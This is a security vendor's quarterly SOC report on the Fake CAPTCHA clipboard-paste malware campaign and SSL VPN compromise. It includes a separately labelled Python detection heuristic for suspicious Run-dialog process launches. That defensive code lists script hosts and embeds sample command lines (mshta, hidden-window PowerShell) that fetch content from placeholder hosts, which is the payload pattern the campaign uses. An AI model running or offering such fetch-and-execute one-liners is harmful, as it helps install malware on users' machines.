Q1 2025 Blackpoint Cyber SOC Insights 

The year 2025 has started with a bang in the cybercriminal landscape. Ransomware operators have continued to wreak havoc on organizations worldwide, malware operators have consistently advanced their operations and deployment methodologies, and advanced persistent threat (APT) groups have remained focused on stealthy operations aimed at data theft. These threats are not new to Blackpoint’s Security Operations Center (SOC), with our team responding 24/7 to the threats that attempt to target our partners, thwarting attempts to deploy malware, move laterally, and shut down access to environments throughout the first quarter of 2025.  

From January 01 to March 31, 2025, Blackpoint’s SOC responded to a total of 6,644 incidents across on-premises, Microsoft 365, and Google Workspace protected environments. In this blog, we’ll dive into the two most prevalent threats Blackpoint’s SOC has observed in the first quarter of 2025 – Secure Sockets Layer Virtual Private Network (SSL VPN) compromise and the Fake CAPTCHA campaign – why they matter for our partners, and possible mitigations using your existing tech stack alongside Blackpoint Cyber’s managed services.  

Q1 High-Level Overview 

From January 01 to March 28, 2025, Blackpoint’s SOC responded to incidents impacting nearly every vertical; however, the top three verticals targeted within incidents observed included:  

  • Industrials (Manufacturing and Construction & Engineering) 
  • Professional & Commercial Services (Business Services) 
  • Consumer Cyclicals  

Critical industries, like Construction & Engineering and Manufacturing, often contribute directly to a nation’s gross domestic product (GDP), create jobs, support other industries, host large amounts of sensitive data, can be used as a springboard for supply chain attacks, and cannot afford the significant downtime a devastating cyberattack causes. These factors make them attractive targets for threat actors of every level, including ransomware operators, information-stealing groups, and initial access brokers (IABs). It is likely these verticals will continue to be primary targets for threat actors over the next 3-6 months.  

Fake CAPTCHA Campaign 

Threat actors have been increasingly abusing CAPTCHA prompts to lure victims into copying scripts and executing them, effectively deploying malware within the compromised environments. There have been dozens of external reports covering this campaign, with almost all incidents following roughly the same pattern.  

  1. A user receives a phishing email or navigates to a compromised website.  
  2. The user is prompted with further instruction to prove they are “not a robot”.  
  3. The user is often instructed to click a button with the phrase “I’m not a robot” or something similar. 
  4. Once the button is clicked, it copies embedded code directly into the victim’s clipboard.  
  5. The user is instructed to open the Run dialog and press “CTRL+V” to paste in the payload that was copied to the clipboard. 
  6. The user is instructed to hit enter. 

Once a victim has completed these steps, they are redirected to a sequence of URLs that result in the deployment of malware. Variants Blackpoint’s SOC has successfully isolated have included Lumma Stealer, SocGholish, NetSupport RAT, AsyncRAT, Venom RAT, Xworm, and more. Blackpoint’s SOC responded to fake CAPTCHA incidents impacting nearly all verticals, with Professional & Commercial Services (Business Services), Institutions & Organizations, and Real Estate verticals being the most impacted.  

More details on the campaign Blackpoint’s SOC has responded to can be found in Blackpoint’s Fake CAPTCHA blog.  
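The pattern above leaves a recognisable trace in process-creation telemetry: the Run dialog is owned by explorer.exe, so the pasted one-liner appears as explorer.exe spawning a script host (mshta, powershell, cmd) with a remote URL on its command line. The following Python scoring function, an added example that is not part of Blackpoint’s post or tooling, runs that heuristic over a handful of constructed records; the field names and the sample records are assumptions, not a specific product’s schema.

```python
import re

# Script hosts and downloaders a pasted Run-dialog one-liner typically invokes.
LAUNCHERS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
             "cscript.exe", "msiexec.exe", "curl.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE)

# Constructed process-creation records (not real telemetry); field names are assumed.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/verify"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://example.invalid/check"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad C:\Users\alice\notes.txt"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Invoke-WebRequest https://updates.example.invalid/x"},
]

def score_event(ev):
    """Return (score, reasons) for one record. A script host is the precondition;
    explorer.exe as parent (the Run dialog's owner), a URL in the command line,
    and a hidden-window flag each add one point."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    parent = ev["parent"].rsplit("\\", 1)[-1].lower()
    if image not in LAUNCHERS:
        return 0, []
    reasons = [f"script host {image}"]
    if parent == "explorer.exe":
        reasons.append("parent explorer.exe (Run dialog / shell)")
    if URL_RE.search(ev["cmdline"]):
        reasons.append("remote URL in command line")
    if HIDDEN_RE.search(ev["cmdline"]):
        reasons.append("hidden-window flag")
    return len(reasons), reasons

def flag_events(events, threshold=3):
    """Return the records scoring at least threshold, in input order."""
    flagged = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append({"cmdline": ev["cmdline"], "score": score, "reasons": reasons})
    return flagged

if __name__ == "__main__":
    for hit in flag_events(SAMPLE_EVENTS):
        print(hit["score"], hit["cmdline"], "|", "; ".join(hit["reasons"]))
```

The fourth record (an admin running PowerShell from cmd.exe with a URL) scores 2 and is deliberately below the threshold, which is the kind of tuning a real rule needs to stay quiet on routine scripting.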

SSL VPN Compromise for Initial Access 

Blackpoint’s SOC has also responded to dozens of incidents in the first quarter of 2025 that were the likely result of threat actors compromising SSL VPN instances, whether by using stolen or weak credentials, exploiting vulnerabilities, or abusing exposed instances. Blackpoint’s SOC responded to incidents impacting the Industrials (Manufacturing), Industrials (Construction & Engineering), and Healthcare verticals most frequently this quarter.  

An SSL VPN is a service that provides users secure access to a network, applications, or utilities from any device. These devices have proven to be an increasingly attractive target for threat actors of all types. Abusing them can have devastating impacts on a victim organization, including ransomware deployment and the theft of sensitive data that can be used for further attacks or sold on cybercriminal forums. 

Blackpoint’s SOC has observed targeting with remote access trojans (RATs), such as NetSupport RAT and RuRAT; Cobalt Strike (a post-exploitation tool commonly observed in cyberattacks); and attempted ransomware attacks attributed to Akira, Fog, and LockBit 3.0. Blackpoint’s SOC has effectively isolated these and worked with our partners to mitigate the threats.  

Additionally, Blackpoint’s SOC and APG teams have worked together to provide emerging threat information to our partners regarding vulnerabilities disclosed in SSL VPN providers throughout the first quarter of 2025.   

Conclusion 

Blackpoint’s APG assesses that both the Fake CAPTCHA campaign and the targeting of SSL VPN instances are very likely to continue through the second quarter of 2025. This assessment is based on the frequency of SOC-observed incidents and external reporting related to both threats.  

Threat actors appear to have found success with the Fake CAPTCHA campaign, exploiting the comfort and complacency that familiar verification prompts create to trick victims into deploying malware onto their own systems. Security surveys have identified that more than 60% of U.S.-based users have the same password for more than one account, while 13% use the same password for nearly all accounts [https://www.getastra.com/blog/security-audit/password-statistics/]. This type of password reuse gives threat actors an opportunity to conduct brute-force attacks and to purchase stolen credentials on cybercriminal forums that are likely to work for corporate user accounts as well.  

Blackpoint’s SOC has continuously identified and prevented these types of attacks throughout the first quarter of 2025 and will continue to thwart these threat actors from successfully targeting our partners. Blackpoint’s SOC and APG will continue to monitor the threat landscape and keep our partners up to date on the current threats.  

Date published: April 2, 2025
Author: Blackpoint Cyber
